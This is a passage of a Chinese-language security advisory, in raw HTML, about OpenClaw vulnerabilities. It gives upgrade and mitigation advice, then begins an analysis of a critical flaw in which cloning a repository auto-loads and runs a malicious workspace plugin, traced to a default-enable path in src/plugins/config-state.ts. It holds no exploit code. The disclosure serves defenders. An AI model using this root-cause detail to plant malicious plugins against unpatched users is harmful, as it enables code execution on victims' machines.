51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">立即行动</span></h3><p data-line="44" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">将 OpenClaw 升级至 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.24</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 或更高版本。</span></strong></p><ul style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px 0px 0px 1.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;list-style-type: disc;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">如果你使用的是桌面客户端，打开应用后检查&#34;关于&#34;页面的版本号，低于 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.24</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 即需更新。</span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">如果你是自托管部署，拉取最新镜像或包后重启服务。</span></p></li></ul><h3 data-line="49" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">我是否受影响？</span></h3><p data-line="51" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">根据你的使用场景自查：</span></p><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;text-align: center;"><img alt="图片" class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="508711171" data-ratio="0.24444444444444444" data-s="300,640" data-type="png" data-w="1080" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;vertical-align: bottom;box-sizing: border-box !important;overflow-wrap: break-word !important;width: 578px !important;visibility: visible !important;height: auto !important;" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f7e65319&amp;u=https%3A%2F%2Fmmecoa.qpic.cn%2Fsz_mmecoa_png%2F4EHqib0vXQF8A4pia76WNBRVAgxcfTQ5TMOzE77LvuQ7ysuzT00nhXK4GrSGPkwGYO9ibtQVMfHc8f1pIyFEWNupt23ntQe9NegvZRugQv8t7E%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%26tp%3Dwebp%26wxfrom%3D10005%26wx_lazy%3D1%23imgIndex%3D2"/></p><h3 data-line="62" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">临时缓解措施（无法立即升级时）</span></h3><p data-line="64" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">如果你暂时无法升级，可采取以下措施降低风险：</span></p><ol style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px 0px 0px 1.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;list-style-type: decimal;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">禁用工作区插件自动发现</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：在设置中关闭&#34;自动加载工作区插件&#34;选项，避免克隆仓库时隐式执行插件。</span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">不要打开来源不明的工作区</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：在升级前，避免克隆或打开陌生人分享的 OpenClaw 工作区。</span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">限制 Gateway 端口访问</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：如果你是自托管用户，通过防火墙规则将 Gateway 端口限制为仅内网可访问，避免 Canvas 路由被公网匿名访问。</span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">停用 Webhook 集成</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：</span><span data-pm-slice="0 0 []" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(51, 51, 51);font-family: &#34;PingFang SC&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.8px;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">如果你使用了 Webhook 集成，在升级前可临时停用，以避免 pre-auth 请求被解析。</span></span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">不要分享 setup code</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：在升级前，避免生成或分享设备配对码，防止被重放利用。</span></p></li></ol><h3 data-line="72" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">自托管用户特别提示</span></h3><ul style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px 0px 0px 1.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;list-style-type: disc;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">网络隔离</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：建议将 OpenClaw Gateway 部署在内网，通过反向代理（如 Nginx）统一处理外部流量，并在代理层添加访问控制。</span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">日志审计</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：检查 Gateway 访问日志，关注来自非预期 IP 的 Canvas 路由请求（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">/canvas/</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）和异常的 WebSocket 连接。</span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">定期更新</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：OpenClaw 安全修复频率较高，建议订阅官方 Release 通知，保持版本在最新稳定版的一个小版本内。</span></p></li></ul><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="80" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2.5em auto 1.5em;padding: 0.3em 1.2em;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;width: fit-content;color: rgb(255, 255, 255);background: rgb(0, 82, 217);border-radius: 6px;box-shadow: none;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">04 漏洞技术分析</span></h2><p data-line="82" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">以下选取部分严重和高危漏洞进行分析：</span></p><h3 data-line="84" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">4.1 插件供应链执行：克隆仓库即运行恶意代码</span></h3><p data-line="86" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">风险等级</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：严重  </span></p><p data-line="86" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">影响版本</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：version &lt;= </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.13</span></code></p><p data-line="89" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">攻击场景</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：攻击者在公开 Git 仓库中放置一个包含恶意插件的 OpenClaw 工作区。受害者克隆该仓库后，旧版本 OpenClaw 会自动发现并加载工作区内的插件，无需用户任何确认操作，恶意代码即在受害者机器上执行。</span></p><p data-line="91" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">技术根因</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/plugins/config-state.ts</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）</span></p><p data-line="93" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">漏洞前态（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.13</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）：非 bundled 插件在没有显式 allow/deny 时，直接返回启用状态，工作区来源插件具备&#34;被发现即启用&#34;的风险。</span></p><p data-line="95" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 